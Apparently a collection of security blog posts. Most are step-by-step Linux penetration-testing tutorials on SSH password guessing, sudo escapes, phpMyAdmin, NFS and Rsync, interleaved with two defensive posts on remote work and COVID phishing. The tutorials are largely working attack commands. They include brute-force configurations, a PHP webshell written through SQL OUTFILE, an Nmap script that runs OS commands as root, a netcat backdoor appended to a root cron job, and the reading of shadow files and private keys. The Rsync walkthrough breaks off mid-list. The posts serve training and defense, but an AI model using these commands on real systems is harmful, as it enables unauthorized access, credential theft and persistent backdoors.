Password guessing is a pretty basic way to gain initial access to a Linux system, but that doesn’t mean it’s not effective.  We see default and weak SSH passwords configured in at least half of the environments we look at.

If you haven’t done it before, below are a few tips to get you started.

  1. Perform additional scanning and fingerprinting against the target SSH server and try to determine if it’s a specific device. For example, determine if it is a known printer, switch, router, or other miscellaneous network device. In many cases, knowing that little piece of information can lead you to default device passwords and land you on the box.
  2. Based on the service fingerprinting, also try to determine if any applications are running on the system that create local user accounts that might be configured with default passwords.
  3. Lastly, try common username and password combinations. Please be careful with this approach if you don’t understand the account lockout policies though.  No one wants to have a bad day. 😊

Password Lists

In this scenario let’s assume we’re going to test for common username and password combinations.  That means we’ll need a file containing a list of users and a file containing a list of passwords.  Kali ships with some good word lists that provide coverage for common usernames and passwords.  Many can be found in /usr/share/wordlists/.


While those can be handy, for this scenario we’re going to create a few small custom lists.

Create users.txt File Containing:

echo user >> users.txt
echo root >> users.txt
echo test >> users.txt

Create passwords.txt File Containing:

echo Password >> passwords.txt
echo Password1 >> passwords.txt
echo toor >> passwords.txt
echo test >> passwords.txt

Password Guessing

Metasploit has modules that can be used to perform online dictionary attacks for most management protocols.  Most of those modules use the protocol_login naming standard (example: ssh_login). Below is an example of the ssh_login module usage.

msfconsole
spool /root/ssh_login.log
use auxiliary/scanner/ssh/ssh_login
set USER_AS_PASS TRUE
set USER_FILE /root/users.txt
set PASS_FILE /root/passwords.txt
set rhosts file:///root/ssh.txt
set threads 100
set verbose TRUE
show options
run

Below is what it should look like if you successfully guess a password.


Here is a quick video example that shows the process of guessing passwords and gaining initial access with Metasploit.

Once you have identified a valid password you can also login using any ssh client.

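For example, using the credentials guessed above (the IP is just an example target):

ssh test@192.168.1.171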


Viewing Sudoers Execution Options

There are a lot of tools like Metasploit, LinEnum, Lynis, LinuxPrivCheck, and UnixPrivsEsc that can be used to help identify weak configurations that could be leveraged for privilege escalation, but we are going to focus on insecure sudoers configurations.

Sudoers is a configuration file in Linux that defines which commands can be run by which users.  It’s also commonly used to define commands that can be run as root by non-root users.

The sudo command below can be used to see what commands our user can run as root.

sudo -l

In this scenario, our user has the ability to run any command as root, but we’ll experiment with a few different command examples.

Exploiting Sudo sh

Unfortunately, we have seen this in a handful of real environments.  Allowing users to execute “sh” or any other shell through sudo provides full root access to the system.  Below is a basic example of dropping into a “sh” shell using sudo.

sudo sh


Exploiting Sudo VI

VI is a text editor that’s installed by default in most Linux distros.  It’s popular with lots of developers. As a result, it’s semi-common to see developers provided with the ability to execute VI through sudo to facilitate the modification of privileged configuration files used in development environments.  Having the ability to modify any file on the system has its own risks, but VI actually has a built-in function that allows the execution of arbitrary commands.  That means, if you provide a user sudo access to VI, you have effectively provided them with root access to your server.

Below is a command example:

vi
ESC (press esc key)
:!whoami

Below are some example screenshots showing the process.


Exploiting Sudo Python

People also love Python.  It’s a scripting language used in every industry vertical and isn’t going away any time soon. It’s actually pretty rare to see Python or other programming engines broadly allowed to execute through sudo, but we have seen it a few times so I thought I’d share an example here.  Python, like most robust scripting and programming languages, supports arbitrary command execution capabilities by default.

Below is a basic command example and a quick video for the sake of illustration:

sudo python -c "import os;os.system('whoami')"

Here are a few quick video examples.

Exploiting Sudo Nmap

Most privilege escalation involves manipulating an application running as a higher privilege into running your code or commands.  One of the many techniques used by attackers is to simply leverage the native functionality of the target application. One common theme we see across many applications is the ability to create and load custom modules, plug-ins, or add-ons.

For the sake of this scenario, let’s assume we can run Nmap using sudo and now we want to use its functionality to execute operating system commands.

When I see that an application like Nmap can be run through sudo, I typically follow a process similar to the one below:

  1. Does Nmap allow me to directly execute os commands?
    No (only in old versions using the --interactive flag and !whoami)
  2. Does Nmap allow me to extend its functionality?
    Yes, it allows users to load and execute custom .nse modules.
  3. What programming language are the .nse modules written in?
    Nmap .nse modules use the LUA scripting engine.
  4. Does the LUA scripting engine support OS command execution?
    Yep. So let’s build a LUA module to execute operating system commands. It’s important to note that we could potentially write a module to execute shell code or call specific APIs, but in this example we’ll keep it simple.

Let’s assume at this point you spent a little time reviewing existing Nmap modules/LUA capabilities and developed the following .nse module.

--- SAMPLE SCRIPT
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local command  = stdnse.get_script_args(SCRIPT_NAME .. ".command") or nil
print("Command Output:")
local t = os.execute(command)
description = [[This is a basic script for executing os commands through a Nmap nse module (lua script).]]
---
-- @usage
-- nmap --script=./exec.nse --script-args='command=whoami'
-- @output
-- Output:
-- root
-- @args command
author = "Scott Sutherland"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "discovery", "safe"}
portrule = shortport.http
action = function(host,port)   
end

Once the module is copied to the target system, you can then run your custom module through Nmap. Below you can see the module successfully runs as our unprivileged user.

nmap --script=./exec.nse --script-args='command=whoami'

sudo nmap --script=./exec.nse --script-args='command=cat /etc/shadow'

Now, you can see we’re able to run arbitrary commands in the root user’s context, when running our new Nmap module through sudo.

So that’s the Nmap example. Also, for the fun of it, we occasionally configure ncat in sudoers when hosting CTFs, but to be honest I’ve never seen that in the real world. Either way, the video below shows both the Nmap and ncat scenarios.

Wrap Up

In this blog we talked about different ways to approach SSH password guessing and attacking sudo applications. I hope it was useful information for those new to the security community.  Good luck and hack responsibly!


Keeping Your Organization Secure While Sending Your Employees to Work from Home

Enabling Employees to Work from Home

All of a sudden, the world is facing a pandemic, and you are asking all your team members to work from home. Have you really considered all the security implications of moving to a remote workforce model? Chances are you and others are more focused on just making sure people can work effectively and are less focused on security. But at times of crisis – hackers are known to increase their efforts to take advantage of any weak links they can find in an organization’s infrastructure.

I travel significantly for work and have always been fortunate to have a good setup to be able to effectively work from anywhere with a reliable Internet connection. Not everyone is this fortunate, nor do many people have the experience of working remotely until now.

Managing Host-Based Security

Host-based security represents a large attack surface that is rapidly evolving as employees continue to become more mobile. Let’s discuss some key things organizations need to keep in mind as they migrate their teams to be effective while working from home.

1. Education/Employee Training

Before we start talking about technical controls that are important to consider, it’s necessary to start with the people factor. All the technical controls can easily be rendered useless if your team members are not properly trained on security. People need to be trained on how to securely access and manage the organization’s IT assets. With a rise in phishing attacks, it’s important that training not only cover secure ways to access different systems, but also how to avoid potential scams. Education is paramount in making sure that the organization is safe, and people in the organization are not making decisions that can have adverse effects from a security and privacy perspective.

2. Workstation Image Security

Most organizations deploy laptops using a standard set of system images and configurations. The problem with using standard images and configurations is that it becomes challenging to secure a workstation in the event that the laptop is lost, stolen, and/or compromised by a threat actor.

Here are some things to consider while trying to secure laptops and mobile devices:

  • Ensure all workstation images are configured based on a secure baseline.
  • Make sure the secure baselines are managed and updated based on business needs.
  • Track critical operating system and application patches, and ensure that they are applied.
  • Review application and management scripts for vulnerabilities and common attack patterns.
  • Enable full-disk encryption.
  • Perform regular security testing for each workstation image – typically organizations have multiple images that are in use – e.g. Windows 7, Windows 10, MacOS, etc.

3. Virtual Desktop Infrastructure (VDI) Security

Many organizations are moving away from physical laptops and are having their employees access applications and desktops through VDI solutions. A common, widely used solution is provided by Citrix. This allows employees to connect to an organization’s systems by remotely connecting to a virtual desktop server (from a personal computer or a mobile device like a tablet or smartphone), working directly in the environment where the virtual desktop is hosted.

The following are some things that are important to consider in this type of a scenario:

  • Enforce multi-factor authentication (MFA) for all VDI portals and VPN access.
  • Ensure that the VDI is configured so that users cannot exfiltrate data through shared drives, the clipboard, email, websites, printer access, or any other common egress point.
  • Enforce proper access control so users cannot easily pivot to critical internal resources like databases, application servers, and domain controllers.
  • Lock down applications to prevent unauthorized access to the operating system resources and ensure that they have the least amount of privileges enabled to function properly.

4. Windows and Linux Server Security

Laptops/workstations and VDI portals are directly exposed to the Internet; Windows and Linux servers typically are not. However, once attackers can pivot into the environment, they usually find it trivial to identify Windows and Linux servers on the network to target. Server operating systems need to be configured, reviewed, and hardened to reduce the attack surface. Vulnerability scanning by itself is usually not enough since it won’t expose vulnerabilities that could be used by authenticated attackers.

5. z/OS Mainframe Security

Windows and Linux servers are typically deployed using standard images, but z/OS mainframes tend to be more unique. In most environments, mainframe configurations are not centrally managed as effectively as their Windows and Linux counterparts, which is why there are many inconsistencies in how mainframes are configured, leading to vulnerabilities that are often accessible to domain users.

It’s important to consider the following:

  • Check for missing critical application and operating system patches on a regular cadence.
  • Centrally manage and implement z/OS mainframe configurations based on a secure baseline.
  • Check if Active Directory domain users can log into z/OS mainframe applications or have direct access through SSH or other protocols.
  • Periodically perform penetration testing and security reviews of your deployed z/OS mainframes.

Linux Hacking Case Studies Part 3: phpMyAdmin

This blog will walk-through how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking phpMyAdmin can be applied to many web applications. This should be a fun walk-through for people new to penetration testing, or those looking for a phpMyAdmin attack refresher.

This is the third of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below are links to the first two blogs in the series:

Below is an overview of what will be covered in this blog:

What is phpMyAdmin?

phpMyAdmin is a web application that can be used to manage local MySQL databases. It’s commonly found in environments of all sizes and occasionally accessible directly from the internet. It’s often used as part of open source projects and as a result some administrators don’t realize that it’s been installed in their environment. Developers also use it to temporarily spin up/down basic test environments, and we commonly see those turn into permanently unmanaged installations on corporate networks. Since we see phpMyAdmin so often, we thought it would be worth sharing a basic overview of how to use it to get a foothold on a system.
To get started, let’s talk about finding phpMyAdmin instances.

Accessing NATed Environments

At the risk of adding unnecessary complexity to this scenario, we’re going to assume that all of our tests are being conducted from a system in a NATed environment.  That means we’re connecting to an SSH server that is exposed to the internet through a firewall, while the environment we’re attacking sits on the other side of that firewall.

Finding PHPMyAdmin

phpMyAdmin is a web application that’s usually hosted by Apache, but it can be hosted by other web servers.  Sometimes it’s installed in the web root directory, but more commonly we see it installed off of the /phpMyAdmin path. For example, https://server/phpMyAdmin.

With this knowledge, let’s start searching for web servers that might be hosting phpMyAdmin instances using our favorite port scanner Nmap:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

Next we can quickly search the phpMyAdmin_scan.gnmap output file for open ports with the command below:

grep -i "open" phpMyAdmin_scan.gnmap


We can see a few Apache instances. We can now target those to determine if phpMyAdmin is being hosted on the webroot or /phpMyAdmin path.

Since we are SSHing into a NATed environment, we are going to forward port 80 through an SSH tunnel to access the web server hosted on 192.168.1.171.  In most cases you won’t have to do any port forwarding, but I thought it would be fun to cover the scenario. A detailed overview of SSH tunneling and SOCKS proxies is out of scope for this blog, but below is my attempt to illustrate what we’re doing.


Below are a couple of options for SSH tunneling to the target web server.

Linux SSH Client

ssh pentest@ssh.servers.com -L 2222:192.168.1.171:80

Windows PuTTY Client
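
The equivalent tunnel can be configured in the PuTTY GUI under Connection > SSH > Tunnels, or with PuTTY’s command-line companion plink using the same hypothetical host as above:

plink.exe pentest@ssh.servers.com -L 2222:192.168.1.171:80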

Once port forwarding is configured, we’re able to access phpMyAdmin by navigating to http://127.0.0.1:2222/phpmyadmin in our local web browser.

Dictionary Attacks against PHPMyAdmin

Now that we’ve found a phpMyAdmin instance the next step is usually to test for default credentials, which are root:[blank].   For the sake of this lab we’ll assume the default has been changed, but all is not lost.  From here we can conduct a basic dictionary attack to test for common user/password combinations without causing trouble.  However, you should always research the web application you’re performing dictionary attacks against to ensure that you don’t cause account lockouts.

There are a lot of great word lists out there, but for the sake of this scenario we kept it simple with the list below.

User List:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Password List:

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

You can use a tool like Burp Intruder to conduct dictionary attacks against phpMyAdmin (and other web applications), but a nice article is already available on the topic here.  So to show an alternative we’ll use Metasploit since it has a module built for the task.  Below are some commands to get you started.

Note: Metasploit is installed on the Kali Linux distribution by default.

msfconsole
use auxiliary/scanner/http/phpmyadmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

Below is a screenshot of what a successful dictionary attack looks like.

[Screenshot: successful Metasploit dictionary attack]

If the dictionary attack discovers valid credentials, you’re ready to login and move onto the next step. Below is a short video showing the dictionary attack process using Metasploit.

Uploading Webshells through phpMyAdmin

Now that we’ve guessed the password, the goal is to determine if there is any functionality that may allow us to execute operating system commands on the server.  MySQL supports user defined functions that could be used, but instead we’re going to write a webshell to the webroot using the OUTFILE function.

Note: In most multi-tiered environments, writing a webshell to the webroot through SQL injection wouldn't work, because the database and web server are not hosted on the same system. phpMyAdmin is a bit of an exception in that regard, since stacks like LAMP, WAMP, and XAMPP typically host the database and web server together. It's also worth noting that in some environments the MySQL service account may not have write access to the webroot or phpMyAdmin directories.

MySQL Code to Write a Webshell

To get started click the “SQL” button to view the query window.  Then execute the query below to upload the custom PHP webshell that can be used to execute commands on the operating system as the Apache service account. Remember that phpMyAdmin may not always be installed to /var/www/phpMyAdmin when executing this in real environments.

SELECT "<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET['cmd']) {​​system($_GET['cmd']);}​​ ?> </pre></BODY></HTML>"

INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'
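Note: If the query fails with a write error, MySQL's secure_file_priv variable may be restricting where OUTFILE can write (a common hardening setting in newer MySQL builds). You can check its value with the following query:

SHOW VARIABLES LIKE 'secure_file_priv';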

The actual code can be downloaded here, but below is a screenshot showing it in context.

[Screenshot: the webshell query executed in the phpMyAdmin SQL window]

The webshell should now be available at http://127.0.0.1:2222/phpMyAdmin/cmd.php.  With that in hand, we can start issuing OS commands and begin privilege escalation.
Below are a few commands to start with:

whoami
ls -al
ls /
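You can also drive the webshell from the command line with curl, which makes scripting enumeration easier. Below is a hedged sketch; note that spaces in commands need to be URL-encoded:

curl "http://127.0.0.1:2222/phpMyAdmin/cmd.php?cmd=id"
curl "http://127.0.0.1:2222/phpMyAdmin/cmd.php?cmd=cat%20/etc/passwd"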

Below is a quick video illustrating the process.

Note: When you’re all done with your webshell make sure to remove it.  Also, consider adding authentication to your webshells so you’re not opening up holes in client environments.

Locating World Writable Files

World-writable files and folders can be written to by any user.  They aren't inherently bad, but when those files are directly or indirectly executed by the root user, they can be used to escalate privileges.

Finding World-Writable Files

Below is the command we'll run through our webshell to locate potentially exploitable world-writable directories.

find / -maxdepth 3 -type d -perm -777 2>/dev/null
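The command above focuses on directories; below is a similar sketch for locating world-writable files:

find / -maxdepth 3 -type f -perm -o+w 2>/dev/null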

From here we can start exploring the affected directories and files, looking for potentially exploitable targets.

Exploiting a World Writable Root Cron Job Script

In our example below, the /scripts/ directory is world-writable.  It appears to contain a script that is run by a root cron job.  While this isn't incredibly common, we have seen it in the wild.  The general idea can be applied to sudo scripts as well.  There are a lot of things we could write to the root cron job script, but for fun we are going to add a line that will start a netcat listener as root.  Then we can connect to the listener from our Linux system.

Display Directory Listing for Scripts

ls /scripts
cat /scripts/rootcron.sh

Add Netcat Backdoor to Root’s Crontab Script

echo "nc -l -p12345 -e /usr/bin/sh& 2>/dev/null" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh

You’ll have to wait for the cron job to trigger, but after that you should be able to connect the netcat backdoor listening on port 12345 from the Linux system.

Below are a few commands you might want to try once connected:

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w

I acknowledge that this seems like an exaggerated scenario, but sometimes reality is stranger than fiction. While this isn't a common occurrence, we have seen very similar scenarios during real penetration tests.  For scenarios that require a reverse shell instead of a bind shell, pentestmonkey.net has a few documented options here.  Finally, below is a quick video showing the netcat backdoor installation and access.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable phpMyAdmin installation and a world-writable script executed by a root cron job. While there are many ways to reach the same end, I think the moral of this story is that web admin interfaces can be soft targets and often support functionality that can lead to command execution.  Also, performing web application discovery and maintenance is an important part of vulnerability management that is often overlooked. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured web platforms like phpMyAdmin in their environments. Good luck and hack responsibly!


Linux Hacking Case Studies Part 2: NFS

This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. This should be a fun overview for people new to penetration testing, or those looking for an NFS refresher. This is the second of a five-part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.  The first blog focused on attacking Rsync and can be found here.

Below is an overview of what will be covered in this blog:

  • What is NFS and Why Should I Care?
  • Finding NFS Servers
  • Enumerating NFS Exports
  • Mounting NFS Exports
  • Viewing UIDs of NFS Exported Directories and Files
  • Searching for Passwords and Private Keys (User Access)
  • Targeting Setuid (Getting Root Access)
  • Wrap Up

What is NFS and Why Should I Care?

Network File System (NFS) is a clear text protocol that is used to transfer files between systems. So what’s the problem? Insecurely configured NFS servers are found during our internal network penetration tests about half of the time. The weak configurations often provide unauthorized access to sensitive data and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the NFS configuration.

Remotely accessing directories shared through NFS exports requires two things: mount access and file access.

  1. Mount access can be restricted by hostname or IP in /etc/exports, but in many cases no restrictions are applied.  It's also worth noting that IPs and hostnames are easy to impersonate (assuming you know what to impersonate).
  2. File access is made possible by configuring exports in /etc/exports and labeling them as readable/writable. File access is then restricted by the connecting user's UID, which can be spoofed.  However, it should be noted that there are some mitigating controls, such as "root squashing", which can be enabled in /etc/exports to prevent access from a UID of 0 (root). An example of an insecure export entry is shown after this list.
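For illustration, below is a hedged example of what an insecure /etc/exports entry might look like. Any host can mount /home read/write, and the no_root_squash option disables the root squashing protection mentioned above:

/home *(rw,sync,no_root_squash)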

The Major Issue with NFS

If it’s possible to mount NFS exports, the UID can usually be manipulated on the client system to bypass file permissions configured on the directory being made available via the NFS export. Access could also be accidentally given if the UID on the file and the UID of the connecting user are the same.

Below is an overview of how unintended access can occur:

  1. On “Server 1” there is a user named “user1” with a UID of 1111.
  2. User1 creates a file named “secret” that is only accessible to themselves and root using a command like “chmod 600 secret”.
  3. A read/write NFS export is then created on Server1 with no IP restrictions that maps to the directory containing user1’s secret file.
  4. On a separate Linux Client System, there is a user named “user2” that also has a UID of 1111.   When user2 mounts the NFS export hosted by Server1, they can read the secret file, because their UID matches the UID of the secret file’s owner (user1 on server1).

Below is an attempt at illustrating the scenario.

[Diagram: UID collision between user1 on Server1 and user2 on the client system]

Finding NFS Servers

NFS listens on UDP/TCP ports 111 and 2049.  Use common tools like nmap to identify open NFS ports.

nmap -sS -sU -pT:2049,111,U:2049,111 192.168.1.0/24 -oA nfs_scan
grep -i "open" nfs_scan.gnmap

Use common tools like nmap or rpcinfo to determine which versions of NFS are currently supported. This may be important later. We want to force the use of version 3 or below so we can view and impersonate the UIDs of the file owners. If root squashing is enabled, impersonating a non-root UID may be a requirement for file access.

Enumerate supported NFS versions with Nmap:

nmap -sV -p111,2049 192.168.1.171

Enumerate supported NFS versions with rpcinfo:

apt-get install nfs-common
rpcinfo -p 192.168.1.171

Below is a short video that shows the NFS server discovery process.

Enumerating NFS Exports

Now we want to list the available NFS exports on the remote server using Metasploit or showmount.

Metasploit example:

root@kali:~# msfconsole
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set rhosts 192.168.1.171
msf auxiliary(nfsmount) > run

Showmount example:

apt-get install nfs-common
showmount -e 192.168.1.171

Mounting NFS Exports

Now we want to mount the available NFS exports while running as root. Be sure to use the “-o vers=3” flag to ensure that you can view the UIDs of the file owners.  Below are some options for mounting the export.

mkdir demo
mount -o vers=3 192.168.1.171:/home demo
mount -o vers=3 192.168.1.222:/home demo -o nolock

or

mount -t nfs -o vers=3 192.168.1.171:/home demo

or

mount -t nfs4 -o proto=tcp,port=2049 192.168.1.171:/home demo

Viewing UIDs of NFS Exported Directories and Files

If you have full access to everything then root squashing may not be enabled. However, if you get access denied messages, then you’ll have to impersonate the UID of the file owner and remount the NFS export to get access (not covered in this blog).
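While the impersonation process isn't covered in depth here, the general idea is simple. Below is a rough sketch that assumes "ls -an" showed files owned by UID 1111, the export is mounted at ./demo, and you are root on the attacking system (the username and file path are arbitrary examples):

useradd -u 1111 impuser
su impuser -c 'cat ./demo/user1/secret'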

List UIDs using mounted drive:

ls -an

List UIDs using nmap:

nmap --script=nfs-ls 192.168.1.171 -p 111

Searching for Passwords and Private Keys (User Access)

Alrighty, let's assume you were able to access the NFS export as root or another user.  Now it's time to try to find passwords and keys that can be used to access the remote server.  Private keys are typically found in /home/<user>/.ssh directories, but passwords are often all over the place.

Find files with “Password” in the name:

cd demo
find ./ -name "*password*"
cat ./test/password.txt

Find private keys in .ssh directories:

mount 192.168.1.222:/ demo2/
cd demo2
find ./ -name "id_rsa"
cat ./root/.ssh/id_rsa
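Filenames aren't the only giveaway; grepping file contents for credential keywords is often fruitful as well. Below is a quick hedged sketch:

grep -riE "password|passwd|secret" ./ 2>/dev/null | head -n 20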

Below is a short video showing the whole mounting and file searching process.

Targeting Setuid (Getting Root Access)

Now that we have an interactive shell as a least-privileged user (test), there are lots of privilege escalation paths we could take, but let's focus on setuid binaries for this round. Binaries can be configured with the setuid flag, which allows users to execute them as the binary's owner.  Similarly, binaries configured with the setgid flag allow users to execute them with the privileges of the file's group.  This can be a good and a bad thing for system administrators.

  • The good news is that setuid binaries can be used to safely execute privileged commands such as passwd.
  • The bad news is that setuid binaries can often be used for privilege escalation if they are owned by root and allow direct execution of arbitrary commands, or indirect execution of arbitrary commands through plugins/modules.

Below are commands that can be used to search for setuid and setgid binaries.

Find Setuid Binaries

find / -perm -u=s -type f 2>/dev/null

Find Setgid Binaries

find / -perm -g=s -type f 2>/dev/null
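If a common utility shows up in these lists, public resources like GTFOBins often document one-line escalations for it. For example, if find itself were setuid root, something like the command below would spawn a root shell (the -p flag tells the shell to keep the elevated effective UID):

find . -exec /bin/sh -p \; -quit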

Below is an example screenshot you might encounter during a pentest.

[Screenshot: setuid binary search results]

Once again, the goal is usually to get the binary to execute arbitrary code as root for you. In real-world scenarios you'll likely have to do a little research or reversing of target setuid binaries in order to determine the best way to do that. In our case, the /home/test/exec binary allows us to directly execute OS commands as root. The source code for the example application can be found at https://github.com/nullbind/Other-Projects/blob/master/random/exec.c.

Below are the sample commands and a screenshot:

cd /home/test/
./exec
whoami

As you can see from the image above, it was possible to execute arbitrary commands as root without too much effort. Below is a video showing the whole setuid exploitation process in action.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable NFS export and an insecure setuid binary. While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured NFS servers. Good luck and hack responsibly!


Staying Safe Online During the COVID-19 Pandemic

Similarities Between Computer Viruses and Medical Viruses

There’s a reason why a computer virus is called a “virus” – they have many similarities with medical viruses (like COVID-19) that have a severe impact on your personal health. Just like Coronavirus can hide its symptoms and be contagious for long periods of time before causing any visible damage, a computer virus operates no different.

With how interconnected we are in today's digital world, malware exploiting a "wormable" remote code execution vulnerability (like EternalDarkness, which affects Microsoft Server Message Block, SMBv3) can start infecting and spreading in a matter of minutes. Typically, this type of virally-distributed malware can also keep its symptoms hidden, like a real virus, until the exploit payload is executed, causing damage to computer systems.

Plenty of Phish in the Sea – Hackers Taking Advantage at a Time of Fear and Uncertainty

It seems like phishing emails increase during any disaster. Hackers take advantage of the human element, especially at a time of fear and uncertainty – like during the major pandemic that we are currently facing. Naturally, due to people's fears and the seriousness of the pandemic, people are actively seeking as much information as they can to keep themselves, their families, and their loved ones safe. Preying on the human element, hackers are actively sending various types of phishing emails related to the Coronavirus. The volume of these phishing emails has reportedly increased significantly over the last couple of weeks. Some of the most common examples of these phishing emails are fake emails:

  • From a doctor with attachments that claim to have certain steps to avoid Coronavirus and encourages the recipient to share the attachment with family and friends.
  • From business partners with attachments that supposedly contain FAQs regarding the Coronavirus.
  • From company management, a link to a meeting recording discussing Coronavirus and how it’s being handled by the organization – with a malicious link embedded in the email instead of a recording.
  • From a fake employee claiming that someone in the company has contracted the Coronavirus, with an attached advisory that all employees are encouraged to read.
  • From an organization that is giving away free equipment and protective gear (like masks) and needs the recipient to click on a link to confirm the delivery address.
  • From HR talking about how they are giving extra money to their employees available only during the next few hours.
  • From the IT service desk asking employees to follow a link and take a survey.
  • From the CDC with a malicious link about new confirmed cases in the recipient’s city.

An Ounce of Prevention Goes a Long Way

Taking a little bit of precaution, especially when it comes to getting infected by malware or having your personal data stolen, goes a long way. The headache and hassle of dealing with a personal data breach or ransomware attack can easily be avoided if people are vigilant and well informed about how to determine whether an email is a phishing attempt.

Common Symptoms of a Phishing Email

1. Requesting Private and Personal Information

Just like you don’t expect the prince of some African country to need your banking information to help them move money around, if you’re receiving an email about a pandemic or issue related to a topic focused on the public health, there’s absolutely no reason why they would need to ask you to click on a link to log in with your user credentials or personal details. Just by using some common sense, you should be able to determine that there’s something very phishy about that email. This should be a clear sign that the email is malicious.

2. Unnecessary Sense of Urgency or Fear Mongering

When it comes to sharing information about a pandemic or any crisis, any given agency or legitimate source of information will most likely use language that's calm and credible. Neither the subject nor the body of the email will typically sound alarmist. In the case that the email is actually conveying an urgent message, it won't require the recipient to click on a link or open an attachment to get the information. Instead, a legitimate email would contain the relevant information in the email body itself.

3. Sender’s Email Address is Unfamiliar or Suspicious

Many phishing emails claim to come from organizations that work in an official capacity during the time of the crisis (e.g., the World Health Organization or the Centers for Disease Control). Emails claiming to be from these organizations, with multiple attachments or links to additional resources and information regarding the crisis at hand, but coming from email addresses ending in @hotmail.com or @aol.com, make absolutely no sense. Hopefully these will be caught by your email spam filter. Unfortunately, some do slip by those filters, and it should be very clear to you that these emails are phishing attempts.

4. Companies Will Usually Use Your Name to Greet You in Emails

Most companies or organizations where you might be a customer, or your doctor’s office for example, will typically have access to some basic information like your name. When they send out communications to you, they will address you with your name instead of a generic salutation like “Dear Client” or “Dear Subscriber.” There are also many cases where hackers will just avoid salutations, especially if they are sending emails offering special deals or requesting the recipient to click on links to go somewhere to potentially get something for free or win something.

5. Poor Spelling and Grammar

Criminals on the internet or fake royal family members from different continents don’t necessarily have the best education, and in many cases, the language in which they are sending out phishing emails may not be their primary language. Therefore, it’s very common that phishing emails will be riddled with spelling errors or poor grammar. Finding oddly structured sentences, weird capitalizations, or just the usage of a completely wrong word or phrase are clear signs of phishing emails.

6. Low Resolution Graphics in Emails

Cybercriminals will often copy and paste logo graphics into emails from different parts of the Internet. An email claiming to be from the CDC with information about the Coronavirus, but with a logo that looks a little fuzzy or tiny, should be a clear red flag that the email is malicious or fake – it's a clear sign that the sender doesn't work for the organization they claim to be from.


Linux Hacking Case Studies Part 1: Rsync

This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. This should be a fun walkthrough for people new to penetration testing, or those looking for an Rsync refresher. This is the first of a five-part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below is an overview of what will be covered in this blog:

  • What is RSYNC and Why Should I Care?
  • Finding RSYNC Servers
  • Enumerating RSYNC Shares
  • Downloading Files via RSYNC
  • Uploading Files via RSYNC
  • Creating a New User through Rsync
  • Attacking Rsync Demo Video
  • Wrap Up

What is RSYNC and Why Should I Care?

Rsync is a utility for transferring and synchronizing files between two servers (usually Linux).  It determines synchronization by checking file sizes and timestamps. So what’s the problem?
Insecurely configured Rsync servers are found during our network penetration tests about a third of the time. The weak configurations often provide unauthorized access to sensitive data, and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the Rsync configuration.

Remotely accessing directories shared through Rsync requires two things: file share access and file permissions.

  1. File share access can be defined in /etc/rsyncd.conf to provide anonymous or authenticated access.
  2. File permissions can also be defined in /etc/rsyncd.conf by defining the user that the Rsync service will run as. If Rsync is configured to run as root, then anyone allowed to connect can access the shared files with the privileges of the root user.

Below is an example of an rsyncd.conf file that allows anonymous root access to the entire file system:

motd file = /etc/rsyncd.motd
lock file = /var/run/rsync.lock
log file = /var/log/rsyncd.log
pid file = /var/run/rsyncd.pid

[files]
path = /
comment = Remote file share.
uid = 0
gid = 0
read only = no
list = yes

Finding RSYNC Servers

By default, the Rsync service listens on port 873. It’s often found configured without authentication or IP restrictions. You can discover Rsync services using tools like nmap.

nmap -sS -sV -p873 192.168.1.0/24 -oA Rsync_scan
grep -i "open" Rsync_scan.gnmap

Enumerating RSYNC Shares

Below are commands that can be used to list the available directories and files.

List available shares

rsync 192.168.1.171::

List subdirectory contents

rsync 192.168.1.171::files

List directories and files recursively

rsync -r 192.168.1.171::files/tmp/

Downloading Files via RSYNC

Below are commands that can be used to download the identified files via Rsync.  This makes it easy to pull down files containing passwords and sensitive data.

Download files

rsync 192.168.1.171::files/home/test/mypassword.txt .

Download folders

rsync -r 192.168.1.171::files/home/test/ .

Uploading Files via RSYNC

Below are commands that can be used to upload files using Rsync.  This can be handy for dropping scripts and binaries into folder locations where they will be automatically executed.

Upload files

rsync ./myfile.txt 192.168.1.171::files/home/test

Upload folders

rsync -r ./myfolder 192.168.1.171::files/home/test

Creating a New User through Rsync

If Rsync is configured to run as root and is anonymously accessible, it’s possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.

Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.

Creating the Home Directory
Let’s start by creating our new user’s home directory.

# Create local work directories
mkdir demo
mkdir backup
cd demo

# Create new user’s home directory
mkdir ./myuser
rsync -r ./myuser 192.168.1.171::files/home

Create the Shadow File Entry
The /etc/shadow file is the Linux password file that contains local users' encrypted passwords and password aging information. It is only accessible by root.

To inject a new user entry via Rsync you’ll have to:

  1. Generate a password.
  2. Create the line to inject.
